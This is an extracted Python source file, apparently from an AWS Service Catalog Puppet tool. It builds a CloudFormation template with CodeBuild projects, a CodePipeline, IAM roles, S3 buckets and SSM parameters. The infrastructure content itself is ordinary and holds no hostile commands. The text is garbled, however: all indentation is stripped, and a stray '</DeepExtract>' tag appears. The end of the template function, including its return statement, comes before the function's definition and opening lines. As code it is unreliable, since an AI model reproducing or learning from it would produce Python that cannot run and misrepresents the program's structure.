single_action_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "section: \\"${SECTION}\\"" > parameters.yaml', 'echo "item: \\"${ITEM}\\"" >> parameters.yaml', 'echo "include_dependencies: \\"${INCLUDE_DEPENDENCIES}\\"" >> parameters.yaml', 'echo "include_reverse_dependencies: \\"${INCLUDE_REVERSE_DEPENDENCIES}\\"" >> parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_action_run_project_args = dict(Name='servicecatalog-puppet-single-action-run', Description='Runs puppet for a single action', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SECTION', 'Value': 'CHANGE_ME - launches|stacks|assertions|spoke-local-portfolios|etc'}, {'Type': 'PLAINTEXT', 'Name': 'ITEM', 'Value': 'CHANGE_ME - name of the launch|stack|assertion|etc'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include your specified items dependencies true|false'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_REVERSE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include things that depend on your specified item true|false'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec)))
single_action_run_project = template.add_resource(codebuild.Project('SingleActionRunProject', **single_action_run_project_args))
single_action_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_action_run_project_args['Name'] = 'servicecatalog-puppet-single-action-run-with-callback'
single_action_run_project_args['Description'] = 'Runs puppet for a single action and then does a http put'
single_action_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_action_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec))
single_action_run_project_with_callback = template.add_resource(codebuild.Project('SingleActionRunWithCallbackProject', **single_action_run_project_args))
</DeepExtract>
stages = [source_stage]
if should_validate:
template.add_resource(codebuild.Project('ValidateProject', Name='servicecatalog-puppet-validate', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': constants.PARTITION_ENVIRONMENTAL_VARIABLE_NAME, 'Value': config.get_partition()}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version='0.2', phases={'install': {'runtime-versions': {'python': '3.9'}, 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, 'build': {'commands': ['servicecatalog-puppet validate manifest.yaml']}})), Type='CODEPIPELINE'), Description='Validate the manifest.yaml file'))
stages.append(codepipeline.Stages(Name='Validate', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source')], Name='Validate', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ValidateProject')], Configuration={'ProjectName': t.Ref('ValidateProject'), 'PrimarySource': 'Source'}, RunOrder=1)]))
if is_manual_approvals:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='DryRun', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DryRunProject')], Configuration={'ProjectName': t.Ref('DryRunProject'), 'PrimarySource': 'Source'}, RunOrder=1), codepipeline.Actions(ActionTypeId=codepipeline.ActionTypeId(Category='Approval', Owner='AWS', Version='1', Provider='Manual'), Configuration={'NotificationArn': t.Ref('DryRunNotificationTopic'), 'CustomData': 'Approve when you are happy with the dry run.'}, Name='DryRunApproval', RunOrder=2), codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source'}, RunOrder=3)])
else:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source', 'EnvironmentVariables': '[{"name":"EXECUTION_ID","value":"#{codepipeline.PipelineExecutionId}","type":"PLAINTEXT"}]'}, RunOrder=1)])
stages.append(deploy_stage)
pipeline = template.add_resource(codepipeline.Pipeline('Pipeline', RoleArn=t.GetAtt('PipelineRole', 'Arn'), Stages=stages, Name=t.Sub('${AWS::StackName}-pipeline'), ArtifactStore=codepipeline.ArtifactStore(Type='S3', Location=t.Sub('sc-puppet-pipeline-artifacts-${AWS::AccountId}-${AWS::Region}')), RestartExecutionOnUpdate=True))
if is_github:
template.add_resource(codepipeline.Webhook('Webhook', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(SecretToken=t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:SecretToken}}'])), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.ref', MatchEquals='refs/heads/' + source.get('Configuration').get('Branch'))], Authentication='GITHUB_HMAC', TargetPipeline=t.Ref(pipeline), TargetAction='Source', Name=t.Sub('${AWS::StackName}-webhook'), TargetPipelineVersion=t.GetAtt(pipeline, 'Version'), RegisterWithThirdParty='true'))
deploy_project_build_spec = dict(version=0.2, phases=dict(install={'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, pre_build={'commands': ['servicecatalog-puppet --info expand --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml manifest.yaml', 'servicecatalog-puppet --info generate-task-reference $PWD/manifest-expanded.yaml']}, build={'commands': ['servicecatalog-puppet --info deploy-from-task-reference --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml --num-workers ${NUM_WORKERS} .']}), artifacts=dict(name='DeployProject', files=['*.yaml', 'manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks/*.json']))
deploy_project_args = dict(Name='servicecatalog-puppet-deploy', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PARAMETER_STORE', 'Name': 'NUM_WORKERS', 'Value': t.Ref(num_workers_ssm_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'SPOKE_EXECUTION_MODE_DEPLOY_ENV', 'Value': constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME}] + deploy_env_vars), Source=codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec)), Description='deploys out the products to be deployed')
deploy_project = template.add_resource(codebuild.Project('DeployProject', **deploy_project_args))
deploy_project_build_spec['phases']['build']['commands'] = ['servicecatalog-puppet --info dry-run manifest-expanded.yaml']
deploy_project_build_spec['artifacts']['name'] = 'DryRunProject'
deploy_project_args['Name'] = 'servicecatalog-puppet-dryrun'
deploy_project_args['Description'] = 'dry run of servicecatalog-puppet-dryrun'
deploy_project_args['Source'] = codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec))
dry_run_project = template.add_resource(codebuild.Project('DryRunProject', **deploy_project_args))
bootstrap_project = template.add_resource(codebuild.Project('BootstrapProject', Name='servicecatalog-puppet-bootstrap-spokes-in-ou', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'OU_OR_PATH', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_NAME', 'Value': 'OrganizationAccountAccessRole'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_ARNS', 'Value': ''}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': ''}]), Source=codebuild.Source(BuildSpec='version: 0.2\nphases:\n install:\n runtime-versions:\n python: 3.9\n commands:\n - pip install aws-service-catalog-puppet\n build:\n commands:\n - servicecatalog-puppet bootstrap-spokes-in-ou $OU_OR_PATH $IAM_ROLE_NAME $IAM_ROLE_ARNS ${OPTIONS}\nartifacts:\n files:\n - results/*/*\n - output/*/*\n name: BootstrapProject\n', Type='NO_SOURCE'), Description='Bootstrap all the accounts in an OU'))
template.add_resource(codebuild.Project('BootstrapASpokeProject', Name='servicecatalog-puppet-bootstrap-spoke', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Sub('${AWS::AccountId}')}, {'Type': 'PLAINTEXT', 'Name': 'ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'ASSUMABLE_ROLE_IN_ROOT_ACCOUNT', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': 'CHANGE_ME'}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['servicecatalog-puppet bootstrap-spoke-as ${PUPPET_ACCOUNT_ID} ${ASSUMABLE_ROLE_IN_ROOT_ACCOUNT} ${ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN} ${OPTIONS}']}))), Type='NO_SOURCE'), Description='Bootstrap given account as a spoke'))
cloud_formation_events_queue = template.add_resource(sqs.Queue('CloudFormationEventsQueue', QueueName='servicecatalog-puppet-cloudformation-events', Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'})))
cloud_formation_events_queue_policy = template.add_resource(sqs.QueuePolicy('CloudFormationEventsQueuePolicy', Queues=[t.Ref(cloud_formation_events_queue)], PolicyDocument={'Id': 'AllowSNS', 'Version': '2012-10-17', 'Statement': [{'Sid': 'allow-send-message', 'Effect': 'Allow', 'Principal': {'AWS': '*'}, 'Action': ['sqs:SendMessage'], 'Resource': '*', 'Condition': {'ArnEquals': {'aws:SourceArn': t.Sub('arn:${AWS::Partition}:sns:*:${AWS::AccountId}:servicecatalog-puppet-cloudformation-regional-events')}}}]}))
spoke_deploy_bucket = template.add_resource(s3.Bucket('SpokeDeployBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-spoke-deploy-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
caching_bucket = template.add_resource(s3.Bucket('CachingBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-caching-bucket-${AWS::AccountId}-${AWS::Region}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
template.add_output(t.Output('CloudFormationEventsQueueArn', Value=t.GetAtt(cloud_formation_events_queue, 'Arn')))
template.add_output(t.Output('Version', Value=t.GetAtt(param, 'Value')))
template.add_output(t.Output('ManualApprovalsParam', Value=t.GetAtt(manual_approvals_param, 'Value')))
template.add_resource(ssm.Parameter('DefaultTerraformVersion', Type='String', Name=constants.DEFAULT_TERRAFORM_VERSION_PARAMETER_NAME, Value=constants.DEFAULT_TERRAFORM_VERSION_VALUE))
return template
|
def get_template(puppet_version, all_regions, source, is_caching_enabled, is_manual_approvals: bool, scm_skip_creation_of_repo: bool, should_validate: bool) -> t.Template:
is_codecommit = source.get('Provider', '').lower() == 'codecommit'
is_github = source.get('Provider', '').lower() == 'github'
is_codestarsourceconnection = source.get('Provider', '').lower() == 'codestarsourceconnection'
is_custom = source.get('Provider', '').lower() == 'custom'
is_s3 = source.get('Provider', '').lower() == 's3'
description = f'Bootstrap template used to bring up the main ServiceCatalog-Puppet AWS CodePipeline with dependencies\n{{"version": "{puppet_version}", "framework": "servicecatalog-puppet", "role": "bootstrap-master"}}'
template = t.Template(Description=description)
version_parameter = template.add_parameter(t.Parameter('Version', Default=puppet_version, Type='String'))
org_iam_role_arn_parameter = template.add_parameter(t.Parameter('OrgIamRoleArn', Default='None', Type='String'))
with_manual_approvals_parameter = template.add_parameter(t.Parameter('WithManualApprovals', Type='String', AllowedValues=['Yes', 'No'], Default='No'))
puppet_code_pipeline_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetCodePipelineRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetCodePipelineRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
source_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('SourceRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the SourceRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_generate_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetGenerateRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetGenerateRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_deploy_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetDeployRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_provisioning_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('PuppetProvisioningRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetProvisioningRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
cloud_formation_deploy_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('CloudFormationDeployRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the CloudFormationDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('DeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type', Default='BUILD_GENERAL1_SMALL'))
spoke_deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('SpokeDeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type for spoke execution mode', Default='BUILD_GENERAL1_SMALL'))
deploy_num_workers_parameter = template.add_parameter(t.Parameter('DeployNumWorkers', Type='Number', Description='Number of workers that should be used when running a deploy', Default=10))
puppet_role_name_parameter = template.add_parameter(t.Parameter('PuppetRoleName', Type='String', Default='PuppetRole'))
puppet_role_path_template_parameter = template.add_parameter(t.Parameter('PuppetRolePath', Type='String', Default='/servicecatalog-puppet/'))
template.add_condition('ShouldUseOrgs', t.Not(t.Equals(t.Ref(org_iam_role_arn_parameter), 'None')))
template.add_condition('HasManualApprovals', t.Equals(t.Ref(with_manual_approvals_parameter), 'Yes'))
template.add_resource(s3.Bucket('StacksRepository', BucketName=t.Sub('sc-puppet-stacks-repository-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
log_bucket = template.add_resource(s3.Bucket('LogStore', BucketName=t.Sub('sc-puppet-log-store-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
manual_approvals_param = template.add_resource(ssm.Parameter('ManualApprovalsParam', Type='String', Name='/servicecatalog-puppet/manual-approvals', Value=t.Ref(with_manual_approvals_parameter)))
template.add_resource(ssm.Parameter('SpokeDeployEnvParameter', Type='String', Name=constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME, Value=t.Ref(spoke_deploy_environment_compute_type_parameter)))
param = template.add_resource(ssm.Parameter('Param', Type='String', Name='service-catalog-puppet-version', Value=t.Ref(version_parameter)))
partition_parameter = template.add_resource(ssm.Parameter('PartitionParameter', Type='String', Name='/servicecatalog-puppet/partition', Value=t.Ref('AWS::Partition')))
puppet_role_name_parameter = template.add_resource(ssm.Parameter('PuppetRoleNameParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/name', Value=t.Ref(puppet_role_name_parameter)))
puppet_role_path_parameter = template.add_resource(ssm.Parameter('PuppetRolePathParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/path', Value=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('ShareAcceptFunctionRole', RoleName='ShareAcceptFunctionRole', ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole')], Path=t.Ref(puppet_role_path_template_parameter), Policies=[iam.Policy(PolicyName='ServiceCatalogActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Resource': {'Fn::Sub': 'arn:${AWS::Partition}:iam::*:role${PuppetRolePath}${PuppetRoleName}'}, 'Effect': 'Allow'}]})], AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['lambda.amazonaws.com']}}]}))
template.add_resource(iam.Role('ProvisioningRole', RoleName='PuppetProvisioningRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_provisioning_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('CloudFormationDeployRole', RoleName='CloudFormationDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['cloudformation.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(cloud_formation_deploy_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('PipelineRole', RoleName='PuppetCodePipelineRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_code_pipeline_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('SourceRole', RoleName='PuppetSourceRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(source_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.REPORTING_ROLE_NAME, RoleName=constants.REPORTING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='ReportingActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:PutObject'], 'Resource': t.Sub('${LogStore.Arn}/*'), 'Effect': 'Allow'}, {'Action': ['cloudwatch:PutMetricData'], 'Resource': '*', 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.CACHE_DOWNLOADING_ROLE_NAME, RoleName=constants.CACHE_DOWNLOADING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='DownloadingCacheActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:GetObject'], 'Resource': t.Sub('${CachingBucket.Arn}/*'), 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(sns.Topic('DryRunNotificationTopic', DisplayName='service-catalog-puppet-dry-run-approvals', TopicName='service-catalog-puppet-dry-run-approvals', Condition='HasManualApprovals'))
deploy_role = template.add_resource(iam.Role('DeployRole', RoleName='PuppetDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_deploy_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
num_workers_ssm_parameter = template.add_resource(ssm.Parameter('NumWorkersSSMParameter', Type='String', Name='/servicecatalog-puppet/deploy/num-workers', Value=t.Sub('${DeployNumWorkers}')))
parameterised_source_bucket = template.add_resource(s3.Bucket('ParameterisedSourceBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-parameterised-runs-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage = codepipeline.Stages(Name='Source', Actions=[codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ParameterisedSource')], Configuration={'S3Bucket': t.Ref(parameterised_source_bucket), 'S3ObjectKey': 'parameters.zip', 'PollForSourceChanges': True}, Name='ParameterisedSource')])
install_spec = {'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}
deploy_env_vars = [{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Ref('AWS::AccountId')}, {'Type': 'PLAINTEXT', 'Name': 'PUPPET_REGION', 'Value': t.Ref('AWS::Region')}, {'Type': 'PARAMETER_STORE', 'Name': 'PARTITION', 'Value': t.Ref(partition_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_NAME', 'Value': t.Ref(puppet_role_name_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_PATH', 'Value': t.Ref(puppet_role_path_parameter)}]
if is_codecommit:
template.add_resource(codecommit.Repository('CodeRepo', RepositoryName=source.get('Configuration').get('RepositoryName'), RepositoryDescription='Repo to store the servicecatalog puppet solution', DeletionPolicy='Retain'))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeCommit'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'RepositoryName': source.get('Configuration').get('RepositoryName'), 'BranchName': source.get('Configuration').get('BranchName'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges', True)}, Name='Source'))
if is_github:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='ThirdParty', Version='1', Provider='GitHub'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'Owner': source.get('Configuration').get('Owner'), 'Repo': source.get('Configuration').get('Repo'), 'Branch': source.get('Configuration').get('Branch'), 'OAuthToken': t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:OAuthToken}}']), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
if is_custom:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='Custom', Version=source.get('Configuration').get('CustomActionTypeVersion'), Provider=source.get('Configuration').get('CustomActionTypeProvider')), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'GitUrl': source.get('Configuration').get('GitUrl'), 'Branch': source.get('Configuration').get('Branch'), 'PipelineName': t.Sub('${AWS::StackName}-pipeline')}, Name='Source'))
